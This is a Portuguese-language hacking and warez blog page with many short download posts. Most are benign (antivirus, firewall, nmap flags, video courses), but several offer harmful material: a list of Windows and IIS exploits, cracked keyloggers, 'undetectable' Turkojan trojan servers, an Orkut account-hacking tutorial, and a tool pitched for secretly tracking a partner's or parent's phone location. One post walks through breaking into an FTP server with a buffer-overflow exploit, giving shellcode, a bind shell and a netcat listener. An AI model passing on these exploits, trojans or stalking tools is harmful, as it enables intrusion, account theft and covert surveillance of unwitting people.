publicidade
publicidade
publicidade
publicidade
publicidade
publicidade
publicidade

ExploitS

CHM >> :::::::::  Exploit que esplora vulnerabilidade no sistema de ajuda do windows

    

    THCIISS >>::::::Exploit  para IIS 5.0 (root remoto)


    RESET  >>:::::::::::::::eXploit que reinicia as conexões TCP em Win2k/XP


    TASK >>::::::: Task Scheduler '.job' Stack Overflow


      
   
Deixe seu Comentário:
Sem comentários »
Categorias:

Nmap

Um dos melhores scaners ja existentes no mundo o nmap dificilmente deixa alguem na bola .O q voce precisa fazer é aprender os comendos q ele usa ,Mas para iniciantes aqui esta uma opçao porque ele roda em GUi oq facilita muito no trabalho de descobertas.Mas deixa adiantar q ele tem mais opçoes se for usado pelo comand prompt do windows ou pelo terminal do linux.Esta versão é para windows mas existem verões para linux.


Sintaxes de utilização:
nmap parâmetros alvo -p portas
PS: Importante ressaltar que o alvo pode ser o endereço IP, o host ou o endereço DNS resolvido.
Os parâmetros são ajustados de acordo com o resultado que se pretende obter, claro. Os parâmetros mais utilizados são:
  • -sT – Com esse parâmetro é feito um escaneamento através de tentativas de conexão TCP. Essa forma é muito fácil de ser identificada por firewalls e IDS;
  • -sS – Assim a tentativa será com pacotes TCP com a flag SYN ligada, ou seja, como apenas uma requisição de conexão. Essa técnica dificulta um pouco a detecção;
  • -sP – Com essa opção o escaneamento será feito através de pacotes ICMP echo request. Verifica apenas se o host está ativo;
  • -sU – Envia pacotes UDP com 0 byte para determinar o estado dessas portas;
  • -sO – É usado para tentar determinar os protocolos suportados pelo host;
  • -O – Com esse parâmetro é feito uma tentativa de determinar o sistema operacional através de uma técnica conhecida como Active FingerPrint.
  • -A – Verifica a porta e o serviço que está rodando.
Saiba mais sobre os métodos de scanning, aplicados pelo Nmap neste artigo. Além dessas opções, o Nmap possui muitas outras, como por exemplo o scan rápido (nmap -F) ou então a opção de não pingar a máquina antes de scaniá-la (nmap -P0).
Em adição a esses métodos de scan, o nmap oferece a opção de escolher “políticas”, de modo a dificultar a detecção pelo IDS da máquina alvo. As opções são “Paranoid”, “Sneaky”“Polite”“Normal”“Aggressive” ou“Insane”.
A opção “Paranoid” escaneia de 5 em 5 minutos cada porta, a “Sneaky”, de 15 em 15 segundos e assim evoluindo.
A vantagem do “scan” ser mais lento é que dificulta a descoberta pelo IDS da máquina alvo. A opção padrão é a normal.
# nmap -T Paranoid|Sneaky|Polite|Normal|Aggressive|Insane alvo
Referências e fontes:
para mais info e comandos a cerca desta ferramenta procure no google ou >
http://www.vivaolinux.com.br/dicas/verDica.php?codigo=810
http://www.vivaolinux.com.br/artigos/verArtigo.php?codigo=2168&pagina=1
http://www.vivaolinux.com.br/artigos/verArtigo.php?codigo=1650&pagina=2
http://br-linux.org/noticias/000267.html
http://insecure.org/nmap/




Deixe seu Comentário:
Sem comentários »
Categorias:

KeyLoggers



Ardamax Keylogger 3.0 - Serial
------------=======-----------


SPYA Key logger 2.1
------=======------



KLdetector13
------====------


spybotsd13
----=====---




Deixe seu Comentário:
1 comentário
Categorias:

ThreatFire Free Edition 4.10.1.14

"Aumente a segurança do seu computador com este programa, que funciona como um complemento para seu antivírus."

O ThreatFire Free Edition é a versão gratuita deste programa que pode servir como um complemento para o seu antivírus. Ele reforça a proteção para seu computador contra worms, trojans, rootkits, spywares, adwares e, claro, vírus.

O programa não exige configurações avançadas ou longos downloads. Basta executá-lo para reforçar as proteções de seu computador.

O diferencial do ThreatFire Free Edition é que ele não utiliza somente signatures, ou seja, listas de vírus, para detectar arquivos perigosos em sua máquina. Ele faz uma análise comportamental para detectar e parar qualquer atividade suspeita que possa comprometer sua segurança.
Detecção Mundial
O ThreatFire Free Edition possui todas as características básicas de um antivírus. Ele remove os arquivos nocivos ou, quando isso não é possível, deixa-os em quarentena, impedido que eles sejam acessados e executados. Este protetor também conta com um scanner para rootkits e outros arquivos que se escondem nas profundezas de seu computador.

Este protetor não pode ser considerado como um antivírus completo, mas é um bom complemento para um programa que você já usa e confia. Ele permite que você personalize as regras para detecção de arquivos nocivos. Isto pode reforçar o seu antivírus padrão na hora de proteger seu computador.

O ThreatFire Free Edition é leve. Mesmo que ele seja executado durante todo tempo e monitore todas as suas atividades, ele requer pouca memória RAM.


Deixe seu Comentário:
Sem comentários »
Categorias:

ProCon Latte 1.7.9.7

"Extensão do Mozilla que filtra qualquer tipo de conteúdo inapropriado de qualquer site."

O mundo da Internet revolucionou nosso modo de vida, esse é um fato indiscutível. Nunca foi tão fácil ter acesso a informações dos mais diversos gêneros, nunca foi tão rápido conversar com alguém. Até a comodidade entrou no meio dessa história com a facilitação de fazer comprar através de sites.

No entanto, não dá para esquecer que existem pessoas mal-intencionadas em todos os lugares, incluindo na Internet obviamente. É só parar para refletir: em um mundo amplo onde é possível se expressar abertamente e de forma anônima, é como um convite aberto para as ameaças. E qualquer um está exposto ao perigo, principalmente crianças e adolescentes.

Pensando nisso, a Corvineum criou um pequeno aplicativo que vai agradar bastante tanto os pais preocupados com a segurança dos filhos, quanto aqueles que gostam de manter o controle do tipo de informação acessada.

Livre-se de conteúdos indevidos...

O ProCon Latte é uma expansão para o Mozilla Firefox que tem a incrivelmente útil função de filtrar qualquer conteúdo de qualquer página da Internet, baseando-se nas palavras do texto presente no site.

... Ou mande sites para a lista branca

Você pode barrar o acesso a páginas inapropriadas — sejam elas sobre pornografia, jogos de azar, crimes cibernéticos — ou bloquear todo o tráfego de informações e liberar o acesso somente determinados sites. Para isso, você adiciona os links na lista branca. Assim, só podem ser acessados os sites selecionados por você.

Características gerais

O aplicativo não só é pequeno como discreto. Ao contrário da grande maioria das expansões, o ProCon Latter não instala uma barra de tarefas no navegador, mas mostra um ícone no canto inferior direito do Mozilla. Invisível, ou quase. Há a opção de retirar a exibição da barra de status e do menu “Ferramentas”.

As configurações são altamente personalizáveis e abertas para você escolher os filtros conforme sua necessidade. Outra característica interessante é que você pode acrescentar uma senha para garantir que ninguém mude as opções de configuração feitas.
Link

Deixe seu Comentário:
Sem comentários »

SpyBot


"Remova programas espiões que você nem imagina existirem no seu computador."

O Spybot - Search & Destroy é um programa para detectar e remover diversos tipos de Spywares de seu computador, pois mesmo que você não saiba, ele pode estar infectado, devido à grande quantidade de spywares diferentes espalhados pela internet ou anexos a programas que eventualmente podem ser instalados na máquina.
O que é um spyware e qual o "estrago" causado
Os spywares são programas de computador cujo objetivo é recolher informações a respeito de um usuário e seu comportamento com relação à internet de forma automática e sem o seu conhecimento nem consentimento. Esse monitoramento serve para verificar o conteúdo de sua navegação de forma a criar um perfil que será repassado a alguma entidade para finalidades variadas.
São diferentes dos trojans porque seu objetivo não é “tomar” o sistema do computador, mas sim apenas o monitoramento dos hábitos do usuário. Existem inclusive spywares desenvolvidos por companhias para vender perfis de usuário formados por meio deles. Elas costumam produzir inúmeras variantes de seus spywares, modificando e melhorando-os não serem detectados e tornarem-se de difícil remoção.
Alguns dos vírus disponíveis carregam consigo spywares, cujo objetivo é roubar dados confidenciais de usuários. Assim é possível capturar logins bancários, montar e enviam logs das atividades do usuário, ou ter acesso a determinados arquivos ou documentos pessoais e confidenciais.
Como o programa funciona
Este programa é uma ferramenta para eliminar mal-intencionados, removendo de seu computador spybots, keyloggers e adwares. Entre as opções do programa, estão disponíveis ferramentas para backup, atualizações (o programa é atualizado constantemente no servidor, e é sempre recomendável mantê-lo rigorosamente em dia) e imunização (que se trata de um processo preventivo para seu navegador, bloqueando alguns tipos de entradas).

Após rastrear seu computador, o programa exibe os resultados de duas formas: aqueles na cor vermelha são spywares, que podem ser ameaças reais ao seu sistema. Resultados na cor verde são rastreadores de uso (que armazenam informações de navegação temporariamente em seu sistema apenas) são inofensivos e excluí-los fica a seu critério, servindo apenas para excluir rastros de navegação interna em seu computador.
Esse procedimento pode ser recomendado para quem compartilha o computador e deseja que esses dados sejam apagados de seus históricos internos de navegação. Recomenda-se sempre cautela na hora de excluir spywares, pois muitas vezes os arquivos hospedeiros podem ser danificados ou até mesmo perdidos completamente.

Deixe seu Comentário:
Sem comentários »
Categorias:
O CallerIP monitora a atividade das portas abertas no seu sistema que na maioria das vezes não estão protegidas pelos firewalls. Assim você poderá identificar hackers antes que o seu sistema ou informações confidenciais sejam comprometidos.



Deixe seu Comentário:
Sem comentários »

Zone Alarm ver > 91_008_000



Um Firewall a sério ( olha ñ basta voce baixar um firewall no brechacker.blogspot.com e instalar em seu pc e sair gritando q TOU SEGURO.....é necessario q vc crie regras de filtragem q vão de acordo com suas necessidades ou seja que protejam seu pc até o nivel q vc deseja "nehum proteje até ao nivel desejado" .Esta versão do famoso e conhecido zone alarm tras melhorias espantosas baixe esperimente e nãos e arrependa.Se vc tiver dificuldades em criar regras de filtragens me contacte se eu estiver disponivel entao levaremos bonx minutos configurando sua nova parede de fogo



Deixe seu Comentário:
Sem comentários »
Categorias:

Tema Windows 8 Profissional

De uma olhadinha no tao esperado SO da gigante Microsoft







Deixe seu Comentário:
Sem comentários »

Mcafee Internet Security 2010 + Serial

 Mcafee é um antivirus conhecido por todo mundo.Mas esta versão é pouco conhecida por maior parte de usuarios da Web.
O McAfee Internet Security 2010 tem um bom desempenho na detecção de malware, apesar de usar bastante memória durante a varredura. Uma curiosidade é que o pacote exige a configuração em modo de compatibilidade para ser instalado no Windows 7. Mas, exceto por isso, não há qualquer outro problema ou mensagem de erro no novo sistema operacional. O destaque do McAfee Internet Security 2010 ficou na detecção de phishing, com apenas dois sites furando a proteção, um desempenho bem superior ao dos concorrentes. Isso se deve ao uso do consagrado SiteAdvisor, que é um dos melhores filtros antiphising do mercado.

Deixe seu Comentário:
1 comentário
Categorias:

Turkojan 4 indetectavel novo 2010

Deixe seu Comentário:
Sem comentários »
Categorias:

Server do turkojan indetectavel (Protector) Até 2010

Deixe seu Comentário:
Sem comentários »
Categorias:
Invadindo FTP com exploit

--------------------------------------------------------------------------------
Por Twi John
Estarei mostrando como invadir FTP com um exploit pronto, além de FTP você pode usar a mesa técnica para invadir Telnet, SSH entre outros.
A falha usada será buffer overflow, não estarei mostrando como funciona a falha, apenas mostrarei como invadir, já que não é aula de programação.
Estarei já muito antigo, mais facil de entender, por isso escolhi ele, este guia estará guiando você não ensinando receita de bolo.
Primeiro você deve identificar o serviço, versão, OS, entre outros. Você pode usar o nmap para isso usando a seguinte linha que gosto de usar:
nmap -v -sV -sC -O host
Para nosso caso, será encontrado um host com Quick 'n Easy FTPD 3.0, será necessario você ter acesso a algum usuario ou ftp anonimo, usando o -sC você saberá se o servidor tem acesso anonimo.
Veja o sistema operaciona.
Feito isso agora vamos usar o exploit em python.
http://www.securiteam.com/exploits/5WP0C2AJ5W.html
Aqui você deve configurar ele:

host = "127.0.0.1" // O Host que será explorado
port = 21 // A porta , por padrão 21
user = "h07" // O usuario, caso tenha acesso anonimo coloque "ftp"
password = "open" // Mesma coisa do usuario
Shellcode: No caso desse exploit será aberto a calculadora do windows, mais você pode estar alterando ele, pode encontrar shellcodes no site do metasploit ou então fazendo você mesmo.

http://www.metasploit.com/shellcode

shellcode = (
#bad chars: 0x00 0x0a 0x0d 0x5c 0x2f
#reconstruction PEB block
#mov dword edx, 0x7FFDF020 ;EDX <-- RtlEnterCriticalSection pointer
#mov dword [edx], 0x77F8AA4C ;RtlEnterCriticalSection pointer <-- original value
#...
"\xba\x20\xf0\xfd\x7f\xc7\x02\x4c\xaa\xf8\x77"

"\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\ x53\ xB9"

"\xad\xaa\x01\x78" #Address of system() function (2000 SP0 polish)

"\xFF\xD1\xEB\xF7")

Pronto, agora ele irá enviar "A" 267, para ocorrer o buffer overflow colocando a shellcode.
Caso você tenha escolhido uma shellcode de bind, antes de explorar você abre o netcat e digita : nc -vv -l -p (porta de bind) -n
Agora usa o exploit e você estará conectado na shell do sistema.
Obrigado, espero que tenham gostado. Me corrijam qualquer coisa.
Deixe seu Comentário:
Sem comentários »
Categorias:

Rastreando sua namorada, amiga mãe e etc..

É só colocar o numero de telefone clicar em Start search...ele vai localizar exatamente o sitio onde a tua mãe,irma,namorada,pai,tio, etc esta.Muito bom para quem quer descobrir onde o pai ou a mãe tem ido nas tardes !
é old mas é good, abraços e façam bom proveito.
Por favor comentem ......
Deixe seu Comentário:
1 comentário
Categorias:

Internet rapida >>>>>>>>>
voce faz download a velocidades inaceitaveis,
Voce é obrigado a esperar dias para finalizar o dowload do seu filminho
Voce deve esperar horas para baixar o novo album do seu cantor favorito

Problema minimizado porque com este software seus downloads vão estar acelerados e muito (eu baixava a 700kbs agora os meus download chegam aatingir uma vekocidade de 1500kbs ! Baixe e esperimente.Testei no Windows 7 ultimate,provavelmente roda sem problema em Xp e vista .

Deixe seu Comentário:
Sem comentários »

Gente Visitem este Link !


Descubra o protocolo TcpIp conheça o na sua totalidade.
Vasculhei p caramba no g... e achei este Curso completo de deste protocolo que é a base de navegação  hoje em dia.

Problema Resolvido

<'$Sky>N3t\                     
                                                                           
Deixe seu Comentário:
Sem comentários »
Categorias:

Skin para MediaPlayer 12



Estes skin são para o WM12 que este é o W media player que vem instalado no windows 7 baiche e ache um ao seu gosto !



Deixe seu Comentário:
Sem comentários »
Categorias:


São varias faixas  musicologas para vc saber pouquinho mais da musica feita em moçambique.Baixa e escute,não se esqueça de comentar e talvez dar sua opinião ! 
_=========_
O que eles devem mudar>>
O que eles tem de errado>>
Se fosse assim seria melhor>>
Nesta faixa faltava isto...>>
etc


Deixe seu Comentário:
Sem comentários »
Categorias:

G Force


4u6w3k G Force DVDRip
» Sinopse
Armados e equipados com o que há de mais moderno no mundo da espionagem, o esquadrão Força-G faz parte de um programa secreto do governo norte-americano. Altamente especializados em enfrentar as mais difíceis missões, eles são muito mais do que agentes comuns, eles são porquinhos-da-índia super treinados, que precisam fazer de tudo para evitar que um excêntrico bilionário siga a sua missão de dominar o mundo. O esquadrão de elite do governo liderado pelo corajoso Darwin é formado pelo perito em armas Blaster e a sexy Juarez, treinada em artes marciais. Além dos três porquinhos, o grupo também tem a presença da mosca Mooch, que faz todo o reconhecimento dos espaços para o grupo, e a toupeira Speckles, especialista em computação. Juntos, esses animais vão mostrar que podem muito mais do que os simples humanos no mundo da espionagem. Mesclando computação gráfica e cenas reais, “Força-G” é a primeira experiência do produtor Jerry Bruckheimer, de “Piratas do Caribe”, em 3D. A direção é do especialista em efeitos visuais Hoyt Yeatman, vencedor do Oscar na categoria por “O Segredo do Abismo”.
» Informações e Servidores.
Continue reading »


Deixe seu Comentário:
Sem comentários »
Categorias:

Curso de Web 2.0 em Video Aula


HK8dCpny6U Curso de Web 2.0 em Video Aula
» Sinopse
O único curso da web de web 2.0
Aprenda neste curso de web2.0 a dominar os padrões web w3, utilizando passo a passo:
Css avançado 100% validado, xhtml 100% validado, Web standard, acessibilidade, usabilidade, e 100% tableless.
Vai aprender a criar um template passo a passo com a estrutura xhtml em tableless. 100% validado pela w3 .
»Informações
Nº de páginas: Video aula
Tamanho: 282Mb
Formato: Iso
Downloads.


Deixe seu Comentário:
Sem comentários »
Categorias:

Aprenda a Formatar computadores


aprendabybaixedetudo.net Aprenda a Formatar computadores
Aprenda a Formatar seu Computador e intalar o windows XP com esse simulador de formatação e instalação do windows xp! É um programa que ensina a instalar o Windows XP, sem ter a preocupação de se mexer no hardware ou software. Apenas simula a instalação do Windows XP como se fosse real.



Download


Deixe seu Comentário:
Sem comentários »
Categorias:

Download – Curso Video-aulas INFO – Redes Wifi 2009

64bb4b9b7077 Download   Curso Video aulas INFO   Redes Wifi 2009

Com este curso você será capaz de montar sua rede sem fio em três horas! Para que se enrolar com os cabos, se da para viver sem eles?

Esse curso feito pela Revista Info Exame explica em video aulas interativas feitas em flash e pequenos videos, como montar uma rede sem fio de baixo custo.
O arquivo de imagem é no formato .nrg, então você deve utilizar o nero para gravar a mídia ou DAEMON Tools que na nossa opinião é uma das maneira simples e muito eficiente de emular unidades de CD e DVD.
Download
Deixe seu Comentário:
Sem comentários »
Categorias:

Video Aula Curso Excel 2003 Completo

excel icon1 Video Aula Curso Excel 2003 Completo

Sinopse.

Aulas:

1 – Conhecendo a Interface do Excel

2 – Copiar e Somar

3 – Formatar e Seqüências

4 – Formatar Colunas e Desfazer

5 – Riscos no uso do Cortar, Eliminar e Inserir

6 – Congelar Painéis e Cálculod e Porcentagem

7 – Fixar Células em Fórmulas

8 – Trabalhando com Planilhas (parte 1)

9 – Trabalhando com Planilhas (parte 2)

10 – Classificar e Agrupar Linhas e Colunas

11 – Autofiltro e Substituir

12 – Comentário e Impressão

13 – Autoformatar e Teclas de Atalho

14 – Cálculo Manual, Arredondamento e Atingir Meta

15 – Proteger Células e Planilhas

16 – Procura Vertical – Proc V

17 – Arredondamento e Listas

18 – Formatação Condicional

19 – Conte Se e Soma Se

20 – Função Condicional

21 – Gráficos

22 – Funções de Banco de Dados

23 – Tabelas Dinâmicas

24 – Formulários

25 – Macros Básicas

Informações.

Tamanho: 502 MB/ 6,16Gb Descompactado

Formato: Rar

Idioma: Português

Download.

MEGAUPLOAD / 2SHARED

Deixe seu Comentário:
Sem comentários »
Categorias:

Dreamweaver AJAX / PHP / MySQL 7 volumes em video-aula

Sem+t%C3%ADtulo Dreamweaver AJAX / PHP / MySQL  7 volumes em video aula
Cursos AJAX / PHP / MySQL DVD 3.8GB 7 volumes em video-aula

Curso de desenvolvimento web para o Dreamweaver 8 e CS3, criando páginas e sistemas em AJAX / PHP / MySQL, trabalhando com as extensões MX Kollection e MX Ajax Toolbox, aonde será criado diversos sistemas e sites com a administração on-line usando todas as ferramentas avançadas disponíveis. Sistema de notícias, galeria de fotos, upload e download de qualquer tipo de arquivo, sistema administrativo de usuários, sistema de produtos, blog, etc. Todos os sistemas citados tem como padrão uma área administrativa.
Curso avançado Dreamweaver volume 2

Curso Avançado Dreamweaver Volume 3 e 3.1 ( 2 volumes em uma pasta)

Curso Avançado Dreamweaver Volume 4

Curso Avançado Dreamweaver Volume 4.1

Curso Avançado Dreamweaver Volume 4.2

Curso Avançado Dreamweaver Volume 5
Nome do livro: Curso Avançado de Dreamweaver PHP MySQL Vol 1,2,3,4,5

Gênero: Curso

Ano de Lançamento: 2008

Editora: Jahio

Nº de páginas:

Tamanho: 3.8GB

Formato: Rar

Idioma: Português
Download
Vol. 1

Vol. 2

Vol. 3

Vol. 4

Vol. 4.1

Vol. 4.2
Vol 5

Link 01

Link 02

Link 03

Link 04
Deixe seu Comentário:
Sem comentários »
Categorias:

Curso Interativo do Wundows 7

cursointerativowindows7 Curso Interativo de Windows Seven
Resumo.

Conheça e aprenda a usar o Windows7.

35 videoaulas com todas as novidades.

Veja como funciona: área de trabalho,

Internet Explorer 8, Windows Explorer,

Media Player 12, Visualizador de imagens

e muito mais.
Informações.

Tamanho: 124 MB

Formato: swf e pdf

Idioma: Português
Servidores.
Deixe seu Comentário:
Sem comentários »
Categorias:

Curso De Hacker 17 Cds em Video Aulas


167kzrr Curso de Hacker completo em video aulas, 17 cds
Descrição:
* Curso De hacker:
+ Com 10 Modulos
+ Sao 20 Cds com video aulas e 80 liçoes adicionais
+ Se impresso sao mais de 1600 paginas com material Exclusivo
* Prof. Marco Aurélio Thompson
+ Presidente da ABSI – Associação Brasileira de Segurança na Internet
+ Consultor Sebrae
+ Escritor
Tamanho total: 7,76 Gb
10 modulos, cada um sobre um assunto
numero de midias: 17 cds
formato: rar, iso, avi
==============================================================
Minha opiniao:
Este curso é completissimo! tem de tudo, começa da estaca zero e vai evoluindo a niveis mais avançados sem agente perceber. Curso todo em video aulas incluindo material de apoio como apostilas e programas usados nos videos.
Baixe todos os modulos e poste nos comentarios se este nao é o melhor conteudo hacker da net.
Parte que eu mais gostei foi como entrar em redes wireless e tendo net de graça no notebook. (somente pra testar, nao estou usando) Muito bom mesmo.
Obs: O curso so saiu em 17 cds e nao em 20 como é dito na apresentação
Dica: Eu nao emulei nem gravei nenhum cd, apenas cliquei em descompactar a propia imagem iso e depois cliquei no executavel.
Servidores.


Deixe seu Comentário:
Sem comentários »
Categorias:

Download CrackDownloader Plus 2.2 | Baixe Cracks e Seriais com apenas um


Que tal um programa que busca cracks e seriais com apenas um clique. CrackDownloader faz isso e muito mais, seguro e rapido de usar!!! Vale Conferir!!!
» Informações
Estilo: Hacker/Keygens
Tamanho: 400 KB
Formato: Rar
Idioma: Português
Servidores: Easy-Share
Deixe seu Comentário:
Sem comentários »
Categorias:

Tutorial: Como Hackear Orkut pelo Hotmail


Descrição:Sabe aquela pessoa que tá enchedo o seu saco no orkut , mandou um recado para sua namorada , ou você que fazer uma zoação com seu colega e quer hackear o orkut dele, então com essa dica você vai aprender a hackiar o orkut pelo msn então boa sorte..… Baixe e Confira!!!

Estilo: Hacker
Tamanho: 1 MB
Formato: Rar
Idioma: Português
Deixe seu Comentário:
Sem comentários »
Categorias: